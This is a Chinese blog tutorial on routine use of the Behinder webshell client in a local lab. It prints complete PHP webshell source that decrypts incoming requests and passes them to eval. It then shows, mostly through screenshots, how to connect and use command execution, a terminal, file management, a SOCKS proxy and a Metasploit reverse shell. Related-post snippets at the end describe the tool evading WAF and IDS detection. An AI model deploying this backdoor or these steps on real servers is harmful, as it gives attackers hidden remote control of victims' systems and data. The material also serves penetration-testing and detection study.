冰蝎常规使用

最新推荐文章于 2024-07-07 14:55:41 发布
最新推荐文章于 2024-07-07 14:55:41 发布
阅读量2w 收藏 68
点赞数 8
分类专栏: 工具使用 文章标签: 运维 服务器 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42342141/article/details/105725044
版权

环境搭建

Web服务器: 本地 win2003(phpstudy搭建)
攻击工具: 冰蝎+kali

具体实施步骤

1、上传webshell

原理参考——>点击
和普通一句话木马类似,需要连接密码。此处为 pass

<?php
@error_reporting(0);
session_start();
if (isset($_GET['pass']))
{
    $key=substr(md5(uniqid(rand())),16);
    $_SESSION['k']=$key;
    print $key;
}
else
{
    $key=$_SESSION['k'];
	$post=file_get_contents("php://input");
	if(!extension_loaded('openssl'))
	{
		$t="base64_"."decode";
		$post=$t($post."");
		
		for($i=0;$i<strlen($post);$i++) {
    			 $post[$i] = $post[$i]^$key[$i+1&15]; 
    			}
	}
	else
	{
		$post=openssl_decrypt($post, "AES128", $key);
	}
    $arr=explode('|',$post);
    $func=$arr[0];
    $params=$arr[1];
	class C{public function __construct($p) {eval($p."");}}
	@new C($params);
}
?>

2、用冰蝎连接

在这里插入图片描述
双击增加的链接显示出phpinfo()即成功!
在这里插入图片描述

3、各个模块使用

3.1 命令执行

在这里插入图片描述

3.2 虚拟终端

在这里插入图片描述

3.3 文件管理

在这里插入图片描述

3.4 Socks代理

注:这个是开在本地的,可监控web服务器的流量
在这里插入图片描述

3.5 反弹shell

结合kali里的msf
在kali上开启侦听:
在这里插入图片描述
然后在冰蝎上点击“给我连
在这里插入图片描述
在这里插入图片描述

3.6数据库管理

在这里插入图片描述
冰蝎基本使用至此结束!
附冰蝎连接:https://github.com/rebeyond/Behinder

初学者L_言
关注
  • 8
    点赞
  • 68
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
冰蝎behinder4.0使用教程网络安全工具使用教程
SHELLCODE_8BIT的博客
09-02 1374
点击生成服务端后就会根据相应传输协议,生成不同语言的webshell。将webshell放置在网站目录中,我的是tomcat,所以放置在。填写脚本类型和传输协议,我的环境为jsp何default_xor。对该条目右键打开,弹出下列信息则说明连接成功。2.选择协议名称,目前有如下几种传输协议。完成添加后,会看到一条新增的网站信息。不同web组件会有不同的目录。对空白处点击新增按钮。
冰蝎逆向初探
悦分享
08-04 1085
其实理解冰蝎整个编写思路并不难,里面的功能(获取服务器基本信息,执行系统命令,文件管理,数据库管理,反弹meterpreter,执行自定义代码等)大致的过程都比较类似。
冰蝎简单使用
00勇士王子的博客
04-29 1万+
冰蝎介绍   Webshell管理工具,动态二进制加密网站客户端。流量动态加密,攻击特征安全设备(WAF、WebIDS)难以检测。   冰蝎通信过程中使用AES(高级加密算法,对称加密,微信小程序使用此种方法)进行加密,Java和.NET默认支持AES,php中需要开启openssl扩展,在V2.0版本后,php环境方式根据服务端支持情况动态选择,使得冰蝎更强大。 常规使用   因为是自己练习,所以直接用phpstudy在本地上传一个shell。   冰蝎安装目录下有官方自带的几个shell 我将shell
Webshell工具-冰蝎4.0配置及使用
最新发布
归零者的博客
07-07 432
冰蝎webshell管理工具用作webshell的连接,4.0版本带自加密功能。要求运行环境jre1.8。
冰蝎使用
热门推荐
bring_coco的博客
03-03 1万+
一.启动 Windows环境下: 1.配置环境:冰蝎只支持jre6-jre8 可以在电脑上查看java版本 命令:java -version 2.启动 在冰蝎目录下命令行输入 命令:java -jar Behinder_v3.0_Beta6_win.jar(这里文件名可简化) 即可开启 Linux环境下: 注意切换jdk版本6-8,对应javac版本也要和java版本相同,同理打开冰蝎目录输入命令 二.使用(在本机进行实测) 环境:phpStudy+冰蝎 通过启动phpStudy,访问本机地址 成功访
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
wangluoanquan111的博客
02-26 1579
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
打点神器behinder(冰蝎使用教程-踩坑版
weixin_69925635的博客
05-29 450
使用命令java -jar Behinder.jar启动后如果java版本过高会报错缺少javafx,但在高版本java环境下安装会有点麻烦,所以安装一个jdk1.8进行替换更好。lhost设置为kali的ip,端口9527,并将这些信息也填在刚刚behinder建立的连接中。点击给我连,msf中exploit该漏洞,可以看到成功反弹shell。在msf中有这个漏洞,因此可以利用msf和behinder联动。将该文件利用靶机dvwa文件上传的漏洞进行上传。在攻击机上安装kali,安装完成后如下图所示。
冰蝎,从入门到魔改(续)1
08-03
3. **User-Agent特征**:冰蝎使用一组较旧的User-Agent字符串。可以通过更新或随机化User-Agent来隐藏特征。 4. **Accept特征**:冰蝎的Accept字段具有不常见的固定值。可以将其更改为常见值以降低被检测的风险。 ...
php冰蝎一句话,利用动态二进制加密实现新型一句话木马之PHP篇(转)冰蝎
weixin_32550525的博客
04-05 844
概述本系列文章重写了java、.net、php三个版本的一句话木马,可以解析并执行客户端传递过来的加密二进制流,并实现了相应的客户端工具。从而一劳永逸的绕过WAF或者其他网络防火墙的检测。本来是想把这三个版本写在一篇文章里,过程中发现篇幅太大,所以分成了四篇,分别是:利用动态二进制加密实现新型一句话木马之Java篇利用动态二进制加密实现新型一句话木马之.net篇利用动态二进制加密实现新型一句话木马...
基于流量侧检测冰蝎webshell交互通讯
12306小哥
08-21 9894
概述 作为新型加密webshell管理客户端,冰蝎算是作为中国菜刀、C刀的替代者。根据网传使用效果,基本得到的反馈是相当的NICE!那么我们能否像检测中国菜刀、C刀那样对冰蝎客户端的流量进行检测,帮助网站管理员判断自己的网站是否存在后门。本文后续一一介绍。 一、冰蝎主要功能 1.基本信息 客户端和服务端握手之后,会获取服务器的基本信息,Java、.NET版本包括环境变量、系统属性等,PHP版本会显...
冰蝎v2.0.1.zip
05-19
冰蝎webshell连接工具,无毒无后门,可放心使用
冰蝎不出网反弹shell
09-06
冰蝎客户端提供了两种反弹Shell的方式,常规Shell和Meterpreter。常规Shell是一种基本的反弹Shell方式,它可以通过与目标主机建立连接来执行命令和控制目标主机。而Meterpreter是一种更高级的反弹Shell,它与...
冰蝎-Webshell管理工具
weixin_66717977的博客
06-30 8104
冰蝎超详解,新手食用
冰蝎软件的配置与应用
weixin_45711977的博客
10-27 7024
冰蝎
冰蝎的安装和使用
weixin_51641247的博客
04-06 5614
相对于菜刀和蚁剑,冰蝎的特点是动态二进制加密实现新型一句话木马,它的数据是加密传输的,右键空白处新增,输入webshell信息,若使用冰蝎自带的webshell则默认密码为rebeyond冰蝎提供asp、c#、php、Java的自定义代码执行功能,文本框支持语法高亮,c#和Java会把输入的源代码自动编译并执行。
冰蝎的原理与安装使用
weixin_59047731的博客
03-11 1914
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量被加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。而老牌的如中国菜刀因为其流量特征太过明显,从而使用的场景越来越少。不过在此还是要致敬前辈的贡献。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值